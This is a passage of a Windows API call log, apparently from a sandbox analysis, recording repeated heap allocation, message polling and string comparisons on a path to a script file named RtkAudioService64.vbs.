wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0205.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0205.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0205.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0205.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0205.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0205.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0205.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0205.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe60 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0205.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0205.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe60 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0205.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0205.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0205.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0205.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0205.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0205.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000b8 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0205.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300040 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6500 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe60 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0205.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6680 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13026f0 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6680 | out: hHeap=0x12c0000) returned 1 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x80) returned 0x148f4f0 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13026f0 | out: hHeap=0x12c0000) returned 1 [0205.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300310 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6680 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0205.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0205.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6710 [0205.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67b8 [0205.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6968 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x68) returned 0x13104c0 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0205.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcd0 [0205.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x68) returned 0x1310d80 [0205.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe70 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 1 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DhJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hJ0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CNFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FevzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="evzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vzX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zX\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13002e8 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="btpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tpanui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="panui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="anui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ui\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RtkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tkAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kAudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AudioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="udioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ioService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oService64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Service64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ervice64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvice64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vice64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ice64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ce64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="64.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 1 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vbs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bs", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0205.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002e8 | out: hHeap=0x12c0000) returned 1 [0205.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302140 [0205.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1310d80 | out: hHeap=0x12c0000) returned 1 [0205.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302140 | out: hHeap=0x12c0000) returned 1 [0205.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6980 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6968 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6680 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67b8 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300310 | out: hHeap=0x12c0000) returned 1 [0205.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x150) returned 0x132a2e8 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x148f4f0 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13104c0 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0205.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.217] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0205.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0205.218] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300068 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6aa0 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd10 [0205.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13026f0 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6878 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0205.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 